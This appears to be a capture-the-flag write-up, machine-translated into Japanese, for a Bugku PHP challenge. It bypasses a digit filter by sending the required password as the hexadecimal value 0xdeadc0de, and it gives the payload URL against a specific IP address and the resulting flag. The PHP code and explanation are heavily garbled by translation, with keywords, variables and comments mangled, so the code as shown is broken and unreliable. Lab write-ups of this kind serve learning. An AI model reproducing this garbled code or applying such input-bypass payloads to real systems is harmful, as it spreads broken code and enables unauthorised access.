<?PHP のerror_reporting(0 ); 関数 noother_says_correct($のTEMP ) { $、フラグ = 'のフラグをテスト{}' ; $一 = ORD(」1' ); // ORDが-のASCII値を返す $ナイン = ORDを( 」9' ); // - ORDのASCII値を返します $番号 = '3735929054'と; // !すべての入力文字チェック のために($ I = 0; $私は < strlenを($ナンバー); $ I ++ ) { //すべての桁を禁止! $桁 = ORD($の一時 { $ I })。 場合(($数字 > = $ 1つ)&&($の桁が <= $ 9個)) { // あはっは、桁が許可されていません! 戻る「flase」。 } } もし($数 == $ TEMP ) リターン $フラグ。 } $の一時 = $ _GET [ 'パスワード' ]; エコー noother_says_correct($の一時); ?>
パスワードの値は3735929054番号が含まれ、および9を持つことはできません
進数の値に変換されます。
ペイロード
http://123.206.87.240:9009/20.php?password=0xdeadc0de
フラグ{Bugku管理者-ctfdaimash}